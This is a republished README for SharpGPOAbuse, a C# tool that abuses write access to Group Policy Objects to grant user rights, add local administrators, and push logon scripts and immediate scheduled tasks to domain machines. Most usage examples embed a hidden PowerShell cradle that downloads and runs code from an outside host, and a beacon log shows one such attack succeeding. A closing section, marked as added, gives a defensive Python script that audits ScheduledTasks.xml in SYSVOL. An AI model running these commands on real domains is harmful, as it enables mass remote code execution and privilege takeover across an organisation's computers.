SharpGPOAbuse - Tool To Take Advantage Of A User's Edit Rights On A Group Policy Object (GPO) In Order To Compromise The Objects That Are Controlled By That GPO

Source: feedproxy.google.com


SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.

More details can be found at the following blog post: https://labs.mwrinfosecurity.com/tools/sharpgpoabuse


Compile Instructions

Make sure the necessary NuGet packages are installed properly and simply build the project in Visual Studio.


Usage
Usage:
SharpGPOAbuse.exe <AttackType> <AttackOptions>

Attack Options

Adding User Rights
Options required to add new user rights:
--UserRights
Set the new rights to add to a user. This option is case sensitive and must be given as a comma-separated list.
--UserAccount
Set the account to add the new rights to.
--GPOName
The name of the vulnerable GPO.

Example:
SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount bob.smith --GPOName "Vulnerable GPO"

Adding a Local Admin
Options required to add a new local admin:
--UserAccount
Set the name of the account to be added to local admins.
--GPOName
The name of the vulnerable GPO.

Example:
SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO"

Configuring a User or Computer Logon Script
Options required to add a new user or computer startup script:
--ScriptName
Set the name of the new startup script.
--ScriptContents
Set the contents of the new startup script.
--GPOName
The name of the vulnerable GPO.

Example:
SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"

If you want to run the malicious script only on a specific user or computer controlled by the vulnerable GPO, you can add an if statement within the malicious script:

SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "if %username%==<targetusername> powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"

Configuring a Computer or User Immediate Task
Options required to add a new computer or user immediate task:

--TaskName
Set the name of the new computer task.
--Author
Set the author of the new task (use a DA account).
--Command
Command to execute.
--Arguments
Arguments passed to the command.
--GPOName
The name of the vulnerable GPO.

Additional User Task Options:
--FilterEnabled
Enable Target Filtering for user immediate tasks.
--TargetUsername
The user to target. The malicious task will run only on the specified user. Should be in the format <DOMAIN>\<USERNAME>.
--TargetUserSID
The targeted user's SID.

Additional Computer Task Options:
--FilterEnabled
Enable Target Filtering for computer immediate tasks.
--TargetDnsName
The DNS name of the computer to target. The malicious task will run only on the specified host.

Example:
SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"

If you want to run the malicious task only on a specific user or computer controlled by the vulnerable GPO you can use something similar to the following:

SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO" --FilterEnabled --TargetDnsName target.domain.com


Additional Options
--DomainController
Set the target domain controller.
--Domain
Set the target domain.
--Force
Overwrite existing files if required.

Example Output
beacon> execute-assembly /root/Desktop/SharpGPOAbuse.exe --AddComputerTask --TaskName "New Task" --Author EUROPA\Administrator --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.141:80/a'))\"" --GPOName "Default Server Policy"
[*] Tasked beacon to run .NET program: SharpGPOAbuse_final.exe --AddComputerTask --TaskName "New Task" --Author EUROPA\Administrator --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.141:80/a'))\"" --GPOName "Default Server Policy"
[+] host called home, sent: 171553 bytes
[+] received output:
[+] Domain = europa.com
[+] Domain Controller = EURODC01.europa.com
[+] Distinguished Name = CN=Policies,CN=System,DC=europa,DC=com
[+] GUID of "Default Server Policy" is: {877CB769-3543-40C6-A757-F2DF4E5E28BD}
[+] Creating file \\europa.com\SysVol\europa.com\Policies\{877CB769-3543-40C6-A757-F2DF4E5E28BD}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!
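
For defenders, the output above shows where the change lands: a ScheduledTasks.xml under the GPO's Machine\Preferences\ScheduledTasks folder in SYSVOL. The following is an added example, not part of SharpGPOAbuse or the original page: a Python audit that lists the immediate tasks defined in such a file so they can be reviewed. The sample XML is constructed, its element names assume the usual Group Policy Preferences layout, and the function names and the `INTERPRETERS` heuristic are hypothetical.

```python
import re
import xml.etree.ElementTree as ET

# Constructed, trimmed sample of <GPO>\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml.
# Element names follow the usual Group Policy Preferences layout (assumption).
SAMPLE_XML = r"""<ScheduledTasks>
  <ImmediateTaskV2 name="Update" changed="2024-01-01 00:00:00">
    <Properties action="C" name="Update" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.3">
        <RegistrationInfo><Author>DOMAIN\Admin</Author></RegistrationInfo>
        <Actions Context="Author"><Exec>
          <Command>cmd.exe</Command>
          <Arguments>/c powershell.exe -nop -w hidden -c "Write-Output test"</Arguments>
        </Exec></Actions>
      </Task>
    </Properties>
    <Filters><FilterComputer name="target.domain.com"/></Filters>
  </ImmediateTaskV2>
</ScheduledTasks>"""

# Hypothetical triage heuristic: script hosts and shells deserve a second look in a GPO task.
INTERPRETERS = re.compile(
    r"\b(powershell|pwsh|cmd|wscript|cscript|mshta|rundll32|regsvr32)(\.exe)?\b", re.I)

def _local(tag):  # strip an XML namespace, if any, so lookups work with or without xmlns
    return tag.rsplit("}", 1)[-1]

def _first_text(node, name):
    """Text of the first descendant element called `name`, or ''."""
    return next(((e.text or "").strip() for e in node.iter() if _local(e.tag) == name), "")

def audit_immediate_tasks(xml_data):
    """Return one finding (dict) per ImmediateTaskV2 in a ScheduledTasks.xml document."""
    findings = []
    root = ET.fromstring(xml_data)
    for task in (t for t in root.iter() if _local(t.tag) == "ImmediateTaskV2"):
        props = next((c for c in task if _local(c.tag) == "Properties"), task)
        cmdline = f'{_first_text(props, "Command")} {_first_text(props, "Arguments")}'.strip()
        findings.append({
            "name": task.get("name", ""),
            "changed": task.get("changed", ""),
            "run_as": props.get("runAs", ""),
            "author": _first_text(props, "Author"),
            "command_line": cmdline,
            "filters": [f"{_local(f.tag)}={f.get('name', '')}"
                        for c in task if _local(c.tag) == "Filters" for f in c],
            "review": bool(INTERPRETERS.search(cmdline)),
        })
    return findings
```

Run it over every ScheduledTasks.xml found under the domain's SYSVOL Policies folder and compare the results with the tasks administrators are known to have deployed; the `changed` value and the GPO version increase mentioned in the output help date an unexpected entry.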

